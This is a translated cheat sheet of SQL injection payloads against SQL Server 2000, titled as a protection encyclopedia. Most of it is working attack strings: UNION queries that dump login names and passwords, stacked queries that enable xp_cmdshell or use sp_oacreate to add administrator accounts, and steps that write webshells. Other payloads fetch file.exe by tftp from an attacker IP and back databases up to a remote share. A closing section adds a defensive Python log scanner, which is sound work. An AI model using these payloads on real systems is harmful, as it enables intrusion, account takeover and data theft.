SQL Server 2000 Injection Protection Encyclopedia (i)

Source: Internet
Author: User

SQL injection started out with ' or '1'='1

Most important system table names:


select * from sysobjects
sysobjects ncsysobjects
sysindexes tsysindexes
syscolumns
systypes
sysusers
sysdatabases
sysxlogins
sysprocesses


Some of the most important user names and roles (present in a default SQL Server database):


public
dbo
guest (generally disabled, or not granted any rights)
db_securityadmin
db_ddladmin


Some default extended stored procedures:


xp_regaddmultistring
xp_regdeletekey
xp_regdeletevalue
xp_regenumkeys
xp_regenumvalues
xp_regread
xp_regremovemultistring
xp_regwrite
xp_availablemedia      drive information
xp_dirtree             directory tree
xp_enumdsn             ODBC connections
xp_loginconfig         server security mode information
xp_makecab             create a compressed (cabinet) file
xp_ntsec_enumdomains   domain information
xp_terminate_process   terminate a process, given its PID

For example:


sp_addextendedproc 'xp_webserver', 'c:\temp\xp_foo.dll'
exec xp_webserver
sp_dropextendedproc 'xp_webserver'
bcp "select * from test..foo" queryout c:\inetpub\wwwroot\runcommand.asp -c -Slocalhost -Usa -Pfoobar
' group by users.id having 1=1--
' group by users.id, users.username, users.password, users.privs having 1=1--
'; insert into users values (666, 'attacker', 'foobar', 0xffff)--

union select top 1 column_name from information_schema.columns where table_name='logintable'--
union select top 1 column_name from information_schema.columns where table_name='logintable' and column_name not in ('login_id')--
union select top 1 column_name from information_schema.columns where table_name='logintable' and column_name not in ('login_id', 'login_name')--
union select top 1 login_name from logintable--
union select top 1 password from logintable where login_name='Rahul'--


Constructed statements: checking whether xp_cmdshell exists


' union select @@version,1,1,1--
and 1=(select @@version)
and 'sa'=(select system_user)
' union select ret,1,1,1 from foo--
' union select min(username),1,1,1 from users where username>'a'--
' union select min(username),1,1,1 from users where username>'admin'--
' union select password,1,1,1 from users where username='admin'--
and user_name()='dbo'
and 0<>(select user_name())--
; declare @shell int exec sp_oacreate 'wscript.shell', @shell output exec sp_oamethod @shell, 'run', null, 'c:\winnt\system32\cmd.exe /c net user swap 5245886 /add'
and 1=(select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell')
; exec master.dbo.sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'


1=(%20select%20count(*)%20from%20master.dbo.sysobjects%20where%20xtype='x'%20and%20name='xp_cmdshell')
and 1=(select is_srvrolemember('sysadmin'))    checks whether the current login has sysadmin (sa) rights
and 0<>(select top 1 paths from newtable)--    the "bauku" (database-dumping) technique
and 1=(select name from master.dbo.sysdatabases where dbid=7)    returns a database name (dbids 1 to 5 are the system databases; 6 and above can be probed)


Creating a virtual directory that maps drive E:


declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', null, 'cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "Default Web Site" -v "E","E:\"'
Access properties (needed in order to write a webshell):
declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', null, 'cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/root/e +browse'


and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
Submit dbid=7, 8, 9 ... in turn to get further database names.
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U')    dumps a table name; assume it is admin

and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name not in ('admin'))    gets the other tables
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and name='admin' and uid>(str(id)))    enumerates the uid of the table; assume it is 18779569 (uid=id)
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569)    gets one field of admin; assume it is user_id
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569 and name not in ('id', ...))    dumps the other fields
and 0<(select user_id from bbs.dbo.admin where username>1)

Once you have the user name you can get the password the same way .... Suppose the fields are user_id, username, password, and so on.


show.asp?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
show.asp?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin


(The union statement is used everywhere, and it works well against Access too.)

Special bauku tip: %5c is '\'; replace the '/' in the URL with %5c and submit.


and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U')    gets the table name
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name not in ('address'))
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and name='admin' and uid>(str(id)))    determines the id value
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=773577794)    enumerates all fields

http://xx.xx.xx.xx/111.asp?id=3400;create table [dbo].[swap] ([swappass] [char](255));--

http://xx.xx.xx.xx/111.asp?id=3400 and (select top 1 swappass from swap)=1
create table newtable (id int identity(1,1), paths varchar(255)) declare @test varchar(255) exec master..xp_regread @rootkey='HKEY_LOCAL_MACHINE', @key='SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\', @value_name='/', values=@test output insert into newtable (paths) values (@test)

http://61.131.96.39/pageshow.asp?tianname=Policy and Regulation&infoid={57c4165a-4206-4c0d-a8d2-e70666ee4e08};use%20master;declare%20@s%20int;exec%20sp_oacreate%20"wscript.shell",@s%20out;exec%20sp_oamethod%20@s,"run",null,"cmd.exe%20/c%20ping%201.1.1.1";--


Having obtained the web path d:\xxxx, next:


http://xx.xx.xx.xx/111.asp?id=3400;use ku1;--
http://xx.xx.xx.xx/111.asp?id=3400;create table cmd (str image);--


The traditional process for testing whether xp_cmdshell exists:


; exec master..xp_cmdshell 'dir'
; exec master.dbo.sp_addlogin hax;--
; exec master.dbo.sp_password null,hax,hax;--
; exec master.dbo.sp_addsrvrolemember hax,sysadmin;--
; exec master.dbo.xp_cmdshell 'net user hax 5258 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
; exec master.dbo.xp_cmdshell 'net localgroup administrators hax /add';--
exec master..xp_servicecontrol 'start','schedule'
exec master..xp_servicecontrol 'start','server'
http://www.xxx.com/list.asp?classid=1; declare @shell int exec sp_oacreate 'wscript.shell', @shell output exec sp_oamethod @shell, 'run', null, 'c:\winnt\system32\cmd.exe /c net user swap 5258 /add'
; declare @shell int exec sp_oacreate 'wscript.shell', @shell output exec sp_oamethod @shell, 'run', null, 'c:\winnt\system32\cmd.exe /c net localgroup administrators swap /add'

http://localhost/show.asp?id=1'; exec master..xp_cmdshell 'tftp -i yourip get file.exe'--

declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\'
declare @a sysname set @a='xp'+'_cm'+'dshell' exec @a 'dir c:\'
; declare @a sysname; set @a=db_name(); backup database @a to disk='\\your_ip\your_share\bak.dat'
If your permissions are restricted, you can use:
select * from openrowset('SQLOLEDB','server';'sa';'','select ''ok!'' exec master.dbo.sp_addlogin hax')
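Defender's view of the payloads listed on this page, as an added example that is not part of the original cheat sheet: a small scanner that decodes web-server request URIs and flags the indicator families these payloads rely on (system-catalog probing, xp_/sp_OA* procedures, union column probing, stacked statements, the ' or '1'='1 tautology and the %5c path trick), including the 'xp_'+'cmdshell' concatenation used above to dodge naive string matching. The log column layout and every sample line are constructed for the example.

```python
import re
from urllib.parse import unquote

# Indicator families drawn from the payloads on this page (constructed regexes,
# not a production signature set).
INDICATORS = {
    "catalog_probe": re.compile(r"\b(sysobjects|syscolumns|sysdatabases|information_schema)\b"),
    "extended_proc": re.compile(r"\b(xp_\w+|sp_oacreate|sp_oamethod|sp_addextendedproc|openrowset)\b"),
    "union_probe": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "stacked_query": re.compile(r";\s*(declare|exec|create|insert|use|backup)\b"),
    "tautology": re.compile(r"'\s*or\s+'?\w+'?\s*=\s*'?\w+"),
    "path_disclosure": re.compile(r"^[^?]*\\"),  # a backslash (%5c) inside the URI stem
}

def normalize(uri):
    """Decode twice (catches double encoding), lower-case, undo the 'xp_'+'cmdshell' split, collapse whitespace."""
    s = unquote(unquote(uri)).lower()
    s = re.sub(r"'\s*\+\s*'", "", s)  # join 'xp'+'_cm'+'dshell' back into one token
    return re.sub(r"\s+", " ", s)

def classify(uri):
    """Return the indicator families matching one request URI (stem plus query)."""
    text = normalize(uri)
    return [name for name, rx in INDICATORS.items() if rx.search(text)]

def scan_log(lines):
    """Return (line number, families) for every matching request. Assumed constructed layout:
    date time c-ip cs-method cs-uri-stem cs-uri-query sc-status ('-' means no query)."""
    hits = []
    for n, line in enumerate(lines, 1):
        f = line.split()
        if len(f) < 7:
            continue
        uri = f[4] + ("" if f[5] == "-" else "?" + f[5])
        families = classify(uri)
        if families:
            hits.append((n, families))
    return hits

# Constructed log excerpt modelled on the payload shapes shown on this page.
SAMPLE_LOG = r"""
2003-05-01 10:00:01 10.0.0.5 GET /show.asp id=3400 200
2003-05-01 10:00:02 10.0.0.5 GET /show.asp id=-1%20union%20select%201,2,3,*%20from%20admin 500
2003-05-01 10:00:03 10.0.0.5 GET /111.asp id=3400;declare%20@a%20sysname%20set%20@a='xp_'+'cmdshell'%20exec%20@a%20'dir%20c:\' 500
2003-05-01 10:00:04 10.0.0.5 GET /bbs%5cshow.asp id=1 500
2003-05-01 10:00:05 10.0.0.5 GET /login.asp user=admin'%20or%20'1'='1 200
2003-05-01 10:00:06 10.0.0.5 GET /111.asp id=3400%20and%201=(select%20count(*)%20from%20master.dbo.sysobjects%20where%20xtype='x'%20and%20name='xp_cmdshell') 200
"""
```

Calling scan_log(SAMPLE_LOG.strip().splitlines()) flags lines 2 to 6 and leaves the plain id=3400 request alone; the same normalisation is what lets a signature for xp_cmdshell survive the string-concatenation variants shown above.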


